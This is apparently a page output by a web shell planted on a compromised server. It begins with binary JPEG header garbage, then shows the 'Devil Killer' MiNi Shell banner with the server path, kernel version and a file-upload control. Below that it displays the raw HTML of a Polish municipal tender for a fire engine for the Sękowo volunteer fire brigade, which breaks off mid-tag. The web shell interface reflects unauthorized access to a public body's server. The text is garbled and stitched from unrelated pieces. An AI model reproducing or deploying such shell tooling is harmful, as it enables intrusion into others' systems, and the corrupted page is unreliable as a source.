JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221020/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221020/0040240001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup samochodu dla Ochotniczej Straży Pożarnej w Sękowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Duszniki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631258365</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sportowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Duszniki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-550</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48612919075</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48612919131</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@duszniki.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.duszniki.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Ochotnicza Straż Pożarna w Sękowie z siedzibą w Sękowie, ul. Szkolna 8, 64-541 Podrzewie </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Gmina Duszniki</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631258365</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Sportowa 1</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Duszniki</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">64-550</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">+48612919075</span></h3> <h3 class="mb-0">1.11.10.) Numer faksu: <span class="normal">+48612919131</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">urzad@duszniki.eu</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.duszniki.eu</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup samochodu dla Ochotniczej Straży Pożarnej w Sękowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c0253223-5067-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00402400</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00022145/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Zakup samochodu dla Ochotniczej Straży Pożarnej w Sękowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gmina_duszniki <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/gmina_duszniki</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim, w formie elektronicznej, za pośrednictwem platformy<br/>zakupowej – dalej zwanej „Platformą”, dostępnej pod adresem strony internetowej:<br/>https://platformazakupowa.pl/pn/gmina_duszniki .Komunikacja między Zamawiającym a<br/>Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane<br/>są w formie elektronicznej za pośrednictwem Platformy i formularza „Wyślij wiadomość do<br/>Zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji<br/>przyjmuje się datę ich przesłania za pośrednictwem Platformy poprzez kliknięcie przycisku „Wyślij<br/>wiadomość do Zamawiającego”, po których pojawi się komunikat, że wiadomość została wysłana do<br/>Zamawiającego.Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za<br/>pośrednictwem Platformy. Informacje dotyczące odpowiedzi na pytania, zmiany SWZ, zmiany terminu<br/>składania i otwarcia ofert Zamawiający będzie zamieszczał na Platformie w sekcji „Komunikaty”.<br/>Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca,<br/>będzie przekazywana w formie elektronicznej za pośrednictwem Platformy do konkretnego<br/>Wykonawcy. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i<br/>wiadomości przesłanych przez Zamawiającego bezpośrednio na Platformie, gdyż system powiadomień<br/>może ulec awarii lub powiadomienie może trafić do folderu SPAM.6. Jeżeli Zamawiający lub<br/>Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje przy użyciu środków<br/>komunikacji elektronicznej, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich<br/>otrzymania. W przypadku braku potwierdzenia otrzymania dokumentu, domniemywa się, że każda ze<br/>stron zapoznała się z jego treścią w momencie przesłania drogą elektroniczną. Zamawiający, zgodnie z<br/>rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środki<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie,<br/>określa niezbędne wymagania sprzętowo – aplikacyjne umożliwiające pracę na Platformie, tj.: stały<br/>dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, komputer klasy<br/>PC lub MAC, o następującej konfiguracji: pamięć min. 2 GB RAM, procesor Intel IV 2 GHz lub jego<br/>nowsza wersja, jeden z systemów operacyjnych – MS Windows 7, Mac Os X 10 4, Linux lub ich nowsze wersje, zainstalowana dowolna przeglądarka internetowa, w<br/>przypadku Internet Explorer minimalnie wersja 10 0., włączona obsługa JavaScript, zainstalowany<br/>program Adobe Acrobat Reader lub inny obsługujący format plików .pdf, Platforma działa według<br/>standardu przyjętego w komunikacji sieciowej – kodowanie UTF8, oznaczenie czasu odbioru danych<br/>przez Platformę Zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar. Wykonawca, przystępując<br/>do niniejszego postępowania o udzielenie zamówienia publicznego:1) akceptuje warunki korzystania z<br/>Platformy, określone w Regulaminie zamieszczonym na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/1-regulamin w zakładce „Regulamin” oraz uznaje go za wiążący,2)<br/>zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod adresem strony<br/>internetowej: https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view .Zamawiający<br/>informuje, że instrukcje korzystania z Platformy dotyczące w szczególności logowania, pobrania<br/>dokumentacji, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności<br/>podejmowanych w niniejszym postępowaniu przy użyciu Platformy znajdują się w zakładce „Instrukcje<br/>dla Wykonawców” pod adresem strony internetowej: https://platformazakupowa.pl/strona/45-instrukcje.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia<br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>• administratorem Pani/Pana danych osobowych jest: Ochotnicza Straż Pożarna<br/>w Sękowie z siedzibą w Sękowie, ul. Szkolna 8, 64-541 Podrzewie oraz Gmina Duszniki<br/>z siedzibą w Dusznikach, ul. Sportowa 1, 64-550 Duszniki, tel. 61 29 19 075, e-mail: urzad@duszniki.eu,<br/>• inspektorem ochrony danych osobowych w Gminie Duszniki jest osoba, z którą można się skontaktować w sprawach ochrony<br/>swoich danych osobowych i realizacji swoich praw: telefonicznie pod nr 61 29 19 075 wew. 110, za pomocą poczty elektronicznej na<br/>adres<br/>e-mail: admin@duszniki.eu lub pisemnie na adres podany wyżej,<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego pn. „Zakup samochodu dla Ochotniczej Straży Pożarnej w Sękowie”, prowadzonym w trybie<br/>podstawowym bez negocjacji,<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 i art. 74 ustawy Pzp,<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy. Protokół postępowania wraz z załącznikami przechowywany będzie przez cały okres obowiązywania umowy w<br/>sprawie zamówienia publicznego (zgodnie z art. 78 ust. 4 ustawy Pzp),<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp,<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO,<br/>• posiada Pani/Pan:<br/>􀀀 na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>􀀀 na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników),<br/>􀀀 na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa<br/>w art. 18 ust. 2 RODO,<br/>􀀀 prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>• nie przysługuje Pani/Panu:<br/>􀀀 w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>􀀀 prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>􀀀 na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia<br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>• administratorem Pani/Pana danych osobowych jest: Ochotnicza Straż Pożarna<br/>w Sękowie z siedzibą w Sękowie, ul. Szkolna 8, 64-541 Podrzewie oraz Gmina Duszniki<br/>z siedzibą w Dusznikach, ul. Sportowa 1, 64-550 Duszniki, tel. 61 29 19 075, e-mail: urzad@duszniki.eu,<br/>• inspektorem ochrony danych osobowych w Gminie Duszniki jest osoba, z którą można się skontaktować w sprawach ochrony<br/>swoich danych osobowych i realizacji swoich praw: telefonicznie pod nr 61 29 19 075 wew. 110, za pomocą poczty elektronicznej na<br/>adres<br/>e-mail: admin@duszniki.eu lub pisemnie na adres podany wyżej,<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego pn. „Zakup samochodu dla Ochotniczej Straży Pożarnej w Sękowie”, prowadzonym w trybie<br/>podstawowym bez negocjacji,<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 i art. 74 ustawy Pzp,<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy. Protokół postępowania wraz z załącznikami przechowywany będzie przez cały okres obowiązywania umowy w<br/>sprawie zamówienia publicznego (zgodnie z art. 78 ust. 4 ustawy Pzp),<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp,<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO,<br/>• posiada Pani/Pan:<br/>􀀀 na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>􀀀 na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników),<br/>􀀀 na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa<br/>w art. 18 ust. 2 RODO,<br/>􀀀 prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>• nie przysługuje Pani/Panu:<br/>􀀀 w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>􀀀 prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>􀀀 na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RRG.271.22.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zamówienie dotyczy zakupu używanego, średniego samochodu pożarniczego z napędem 4x4<br/>dla jednostki Ochotniczej Straży Pożarnej w Sękowie.<br/>2. Przedmiot zamówienia należy dostarczyć do siedziby Ochotniczej Straży Pożarnej w Sękowie<br/>przy ul. Szkolnej 8 w Sękowie, 64-541 Podrzewie.<br/>3. Szczegółowy opis przedmiotu zamówienia wraz z opisem wymagań dla średniego samochodu pożarniczego z napędem<br/>4x4, stanowi załącznik nr 1 do SWZ.<br/>4. Wszystkie wymagania określone w załączniku nr 1 do SWZ stanowią wymagania minimalne. Niespełnienie ww. wymagań<br/>minimalnych będzie skutkować odrzuceniem oferty jako niezgodnej<br/>z warunkami zamówienia.<br/>5. Zamawiający wymaga udzielenia przez Wykonawcę gwarancji jakości na przedmiot zamówienia<br/>na okres 6 miesięcy od dnia jego odbioru. Szczegółowe warunki gwarancji jakości zostały określone<br/>w projektowanych postanowieniach umowy.<br/>6. Zamawiający dopuszcza rozwiązania równoważne. W każdym przypadku użycia w opisie przedmiotu zamówienia norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2<br/>oraz ust. 3 ustawy Pzp Wykonawca powinien przyjąć, że odniesieniu takiemu towarzyszą wyrazy „lub równoważne”. W<br/>przypadku użycia odniesień do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów<br/>referencji technicznych Zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca analizując opis<br/>przedmiotu zamówienia powinien założyć, że każdemu odniesieniu użytemu w opisie przedmiotu zamówienia towarzyszy<br/>wyraz „lub równoważne&#34;. W przypadku, gdy zostały użyte znaki towarowe, oznacza to, że są podane przykładowo i<br/>określają jedynie minimalne oczekiwane parametry jakościowe oraz wymagany standard. Wykonawca może zastosować<br/>materiały lub urządzenia równoważne, lecz o parametrach technicznych i jakościowych podobnych lub lepszych, których<br/>zastosowanie w żaden sposób nie wpłynie negatywnie na prawidłowe funkcjonowanie przedmiotu zamówienia. Wykonawca,<br/>który zastosuje urządzenia lub materiały równoważne będzie obowiązany wykazać w trakcie realizacji zamówienia, że<br/>zastosowane przez niego urządzenia i materiały spełniają wymagania określone przez Zamawiającego. Użycie etykiety<br/>oznacza, że Zamawiający akceptuje wszystkie etykiety potwierdzające, że dane dostawy spełniają równoważne wymagania<br/>określonej przez zamawiającego etykiety. W przypadku gdy Wykonawca z przyczyn od niego niezależnych nie może<br/>uzyskać określonej przez Zamawiającego etykiety<br/>lub równoważnej etykiety, Zamawiający, w terminie, przez siebie wyznaczonym akceptuje inne odpowiednie przedmiotowe<br/>środki dowodowe, w szczególności dokumentację techniczną producenta, o ile dany wykonawca udowodni, że dostawy,<br/>które mają zostać przez niego wykonane, spełniają wymagania określonej etykiety lub określone wymagania wskazane<br/>przez Zamawiającego. Użycie wymogu posiadania certyfikatu wydanego przez jednostkę oceniającą zgodność lub<br/>sprawozdania z badań przeprowadzonych przez tę jednostkę jako środka dowodowego potwierdzającego zgodność z<br/>wymaganiami lub cechami określonymi w opisie przedmiotu zamówienia, kryteriach oceny ofert lub warunkach realizacji<br/>zamówienia oznacza, że zamawiający akceptuje również certyfikaty wydane przez inne równoważne jednostki oceniające<br/>zgodność. Zamawiający akceptuje także inne odpowiednie środki dowodowe, w szczególności dokumentację techniczną<br/>producenta, w przypadku, gdy dany Wykonawca nie ma ani dostępu do certyfikatów lub sprawozdań z badań, ani<br/>możliwości ich uzyskania w odpowiednim terminie, o ile ten brak dostępu nie może być przypisany danemu Wykonawcy,<br/>oraz pod warunkiem że dany Wykonawca udowodni, że wykonywane przez niego dostawy spełniają wymogi lub kryteria<br/>określone w opisie przedmiotu zamówienia, kryteriach oceny ofert lub wymagania związane z realizacją zamówienia. Celem<br/>niniejszego postępowania jest osiągnięcie określonej w SWZ jakości i funkcjonalności. Wykonawca, który powołuje się na<br/>rozwiązania równoważne, jest zobowiązany wykazać, że oferowane przez niego rozwiązanie spełnia wymagania określone<br/>przez Zamawiającego.<br/>7. Termin wykonania zamówienia: 30 dni (kalendarzowych) od dnia podpisania umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34144210-3 - Wozy strażackie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 